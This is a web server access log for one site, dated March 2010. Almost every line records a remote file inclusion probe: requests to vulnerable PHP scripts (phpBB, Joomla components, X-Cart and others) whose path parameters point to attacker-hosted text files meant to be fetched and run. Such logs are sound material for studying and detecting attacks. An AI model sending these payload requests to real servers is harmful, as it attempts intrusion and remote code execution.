200.93.147.154 - - [04/Mar/2010:10:42:20 -0800] "GET /OpenSiteAdmin/pages/pageHeader.php?path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:10:42:20 -0800] "GET /logs//OpenSiteAdmin/pages/pageHeader.php?path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:10:42:21 -0800] "GET /logs/access_100224.log%20%20//OpenSiteAdmin/pages/pageHeader.php?path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:10:42:39 -0800] "GET /OpenSiteAdmin/pages/pageHeader.php?path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:10:42:39 -0800] "GET /logs//OpenSiteAdmin/pages/pageHeader.php?path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:10:42:41 -0800] "GET /logs/access_100224.log%20%20//OpenSiteAdmin/pages/pageHeader.php?path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [04/Mar/2010:10:44:01 -0800] "GET /logs/access_100220.log%20%20//com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://bdkorea.org/zeroboard/data/bangla_notice/gh1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [04/Mar/2010:10:44:01 -0800] "GET /com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://bdkorea.org/zeroboard/data/bangla_notice/gh1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [04/Mar/2010:10:44:01 -0800] "GET /logs//com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://bdkorea.org/zeroboard/data/bangla_notice/gh1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.124.120.61 - - [04/Mar/2010:10:44:11 -0800] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.124.120.61 - - [04/Mar/2010:10:44:11 -0800] "GET /logs/access_100208.log%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.124.120.61 - - [04/Mar/2010:10:44:11 -0800] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.124.120.61 - - [04/Mar/2010:10:44:14 -0800] "GET /logs/access_100224.log%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [04/Mar/2010:10:44:22 -0800] "GET /logs/access_100224.log%20%20//com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://bdkorea.org/zeroboard/data/bangla_notice/gh1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [04/Mar/2010:10:44:22 -0800] "GET /logs/access_100215.log%20%20//com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://bdkorea.org/zeroboard/data/bangla_notice/gh1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [04/Mar/2010:10:44:23 -0800] "GET /logs/access_100131.log%20%20//com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://bdkorea.org/zeroboard/data/bangla_notice/gh1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:10:44:27 -0800] "GET /logs///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:10:44:27 -0800] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:10:44:34 -0800] "GET /logs/access_100130.log%20%20///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [04/Mar/2010:10:44:44 -0800] "GET /logs//index.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [04/Mar/2010:10:44:44 -0800] "GET /logs/access_100213.log%20%20//index.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [04/Mar/2010:10:44:44 -0800] "GET /index.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [04/Mar/2010:10:44:53 -0800] "GET /index.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [04/Mar/2010:10:44:53 -0800] "GET /logs//index.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [04/Mar/2010:10:44:53 -0800] "GET /logs/access_100213.log%20%20//index.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [04/Mar/2010:10:44:56 -0800] "GET /logs/access_100217.log%20%20//com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://bdkorea.org/zeroboard/data/bangla_notice/gh1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [04/Mar/2010:10:44:59 -0800] "GET /logs/access_100213.log%20%20//index.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [04/Mar/2010:10:44:59 -0800] "GET /logs//index.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [04/Mar/2010:10:45:00 -0800] "GET /index.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [04/Mar/2010:10:45:05 -0800] "GET /logs/access_100126.log%20%20//com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://bdkorea.org/zeroboard/data/bangla_notice/gh1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:10:45:48 -0800] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:10:45:49 -0800] "GET /logs///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:10:45:52 -0800] "GET /logs/access_100130.log%20%20///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:10:46:10 -0800] "GET /logs/access_100216.log%20%20///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:10:46:34 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:10:46:34 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:10:47:12 -0800] "GET /logs/access_100206.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [04/Mar/2010:10:47:27 -0800] "GET /logs/access_100218.log//index.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [04/Mar/2010:10:47:27 -0800] "GET /logs/access_100213.log//index.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:10:47:39 -0800] "GET /logs/access_100216.log%20%20///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [04/Mar/2010:10:47:41 -0800] "GET /logs/access_100220.log//com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://bdkorea.org/zeroboard/data/bangla_notice/gh1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [04/Mar/2010:10:47:46 -0800] "GET /logs/access_100224.log//com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://bdkorea.org/zeroboard/data/bangla_notice/gh1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:10:48:36 -0800] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:10:48:36 -0800] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:10:48:36 -0800] "GET /logs/access_100208.log%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:10:48:43 -0800] "GET /logs/access_100224.log%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.124.120.61 - - [04/Mar/2010:10:48:45 -0800] "GET /logs/access_100208.log/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.124.120.61 - - [04/Mar/2010:10:48:45 -0800] "GET /logs/access_100224.log/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [04/Mar/2010:10:49:23 -0800] "GET /logs/access_100218.log//index.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [04/Mar/2010:10:49:23 -0800] "GET /logs/access_100213.log//index.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [04/Mar/2010:10:49:24 -0800] "GET /logs/access_100218.log//index.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [04/Mar/2010:10:49:29 -0800] "GET /logs/access_100213.log//index.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:10:52:54 -0800] "GET /logs/access_100208.log/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:10:52:55 -0800] "GET /logs/access_100224.log/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [04/Mar/2010:10:54:00 -0800] "GET /admin/auth.php?xcart_dir=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [04/Mar/2010:10:54:01 -0800] "GET /logs//admin/auth.php?xcart_dir=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [04/Mar/2010:10:54:01 -0800] "GET /logs/access_100128.log%20%20//admin/auth.php?xcart_dir=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [04/Mar/2010:10:54:01 -0800] "GET /admin/auth.php?xcart_dir=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [04/Mar/2010:10:54:01 -0800] "GET /logs/access_100128.log//admin/auth.php?xcart_dir=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [04/Mar/2010:10:54:01 -0800] "GET /logs//admin/auth.php?xcart_dir=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:10:54:15 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:10:54:15 -0800] "GET /logs/access_100131.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:10:54:15 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [04/Mar/2010:10:54:40 -0800] "GET /admin/auth.php?xcart_dir=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [04/Mar/2010:10:54:41 -0800] "GET /logs/access_100128.log//admin/auth.php?xcart_dir=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [04/Mar/2010:10:54:41 -0800] "GET /logs//admin/auth.php?xcart_dir=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [04/Mar/2010:10:55:02 -0800] "GET /logs/access_100207.log%20%20//admin/auth.php?xcart_dir=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [04/Mar/2010:10:55:15 -0800] "GET /logs/access_100207.log//admin/auth.php?xcart_dir=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [04/Mar/2010:10:55:15 -0800] "GET /logs/access_100207.log//admin/auth.php?xcart_dir=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.90.115.49 - - [04/Mar/2010:10:56:29 -0800] "GET /logs/access_100217.log%20/////index.php?p=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
93.90.115.49 - - [04/Mar/2010:10:56:29 -0800] "GET /logs/////index.php?p=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
93.90.115.49 - - [04/Mar/2010:10:56:30 -0800] "GET ////index.php?p=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 200 3642 "-" "-" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:10:57:22 -0800] "GET /logs/access_100207.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [04/Mar/2010:10:57:43 -0800] "GET /admin/auth.php?xcart_dir=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [04/Mar/2010:10:57:43 -0800] "GET /logs/access_100128.log//admin/auth.php?xcart_dir=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [04/Mar/2010:10:57:43 -0800] "GET /logs//admin/auth.php?xcart_dir=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [04/Mar/2010:10:57:50 -0800] "GET /logs/access_100207.log//admin/auth.php?xcart_dir=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [04/Mar/2010:11:00:33 -0800] "GET /logs//?_zb_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [04/Mar/2010:11:00:33 -0800] "GET /logs/access_100202.log//?_zb_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [04/Mar/2010:11:00:34 -0800] "GET /?_zb_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:11:01:26 -0800] "GET /logs/access_100131.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:11:01:27 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:11:01:27 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:11:01:38 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:11:01:38 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:11:01:42 -0800] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:11:01:42 -0800] "GET /logs/access_100201.log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:11:01:43 -0800] "GET /logs/access_100218.log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:11:01:47 -0800] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [04/Mar/2010:11:01:48 -0800] "GET /logs/access_100224.log%20%20//index.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [04/Mar/2010:11:01:49 -0800] "GET /index.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [04/Mar/2010:11:01:49 -0800] "GET /index.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [04/Mar/2010:11:02:11 -0800] "GET /logs/access_100210.log%20%20//index.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [04/Mar/2010:11:02:12 -0800] "GET /logs/access_100210.log%20%20//index.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.236.148 - - [04/Mar/2010:11:05:21 -0800] "GET /modules/xfsection/modify.php?dir_module=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.236.148 - - [04/Mar/2010:11:05:21 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.236.148 - - [04/Mar/2010:11:05:21 -0800] "GET /logs/access_100204.log//modules/xfsection/modify.php?dir_module=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:11:05:26 -0800] "GET /logs/access_100207.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:11:05:44 -0800] "GET /logs/access_100207.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:11:05:45 -0800] "GET /logs/access_100224.log//OpenSiteAdmin/pages/pageHeader.php?path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:11:07:02 -0800] "GET /logs/access_100224.log//OpenSiteAdmin/pages/pageHeader.php?path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.63.96.201 - - [04/Mar/2010:11:07:11 -0800] "GET /admin/auth.php?xcart_dir=http://mycomputerdaddy.com/momma/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.63.96.201 - - [04/Mar/2010:11:07:11 -0800] "GET /logs//admin/auth.php?xcart_dir=http://mycomputerdaddy.com/momma/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.63.96.201 - - [04/Mar/2010:11:07:11 -0800] "GET /logs/access_100128.log%20%20//admin/auth.php?xcart_dir=http://mycomputerdaddy.com/momma/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.63.96.201 - - [04/Mar/2010:11:07:23 -0800] "GET /admin/auth.php?xcart_dir=http://mycomputerdaddy.com/momma/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.63.96.201 - - [04/Mar/2010:11:07:24 -0800] "GET /logs/access_100128.log%20%20//admin/auth.php?xcart_dir=http://mycomputerdaddy.com/momma/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.63.96.201 - - [04/Mar/2010:11:07:24 -0800] "GET /logs//admin/auth.php?xcart_dir=http://mycomputerdaddy.com/momma/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.47.7.71 - - [04/Mar/2010:11:07:24 -0800] "GET /logs/access_100221.log//delete.php?board_skin_path=http://www.kamawilson.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.47.7.71 - - [04/Mar/2010:11:07:24 -0800] "GET /logs/access_100217.log//delete.php?board_skin_path=http://www.kamawilson.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.47.7.71 - - [04/Mar/2010:11:07:24 -0800] "GET /logs//delete.php?board_skin_path=http://www.kamawilson.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.47.7.71 - - [04/Mar/2010:11:07:24 -0800] "GET /delete.php?board_skin_path=http://www.kamawilson.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.63.96.201 - - [04/Mar/2010:11:07:51 -0800] "GET /logs/access_100207.log%20%20//admin/auth.php?xcart_dir=http://mycomputerdaddy.com/momma/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.63.96.201 - - [04/Mar/2010:11:08:01 -0800] "GET /logs/access_100207.log%20%20//admin/auth.php?xcart_dir=http://mycomputerdaddy.com/momma/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [04/Mar/2010:11:08:36 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [04/Mar/2010:11:08:36 -0800] "GET /logs/access_100131.log//modules/TotalCalendar/about.php?inc_dir=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [04/Mar/2010:11:08:38 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
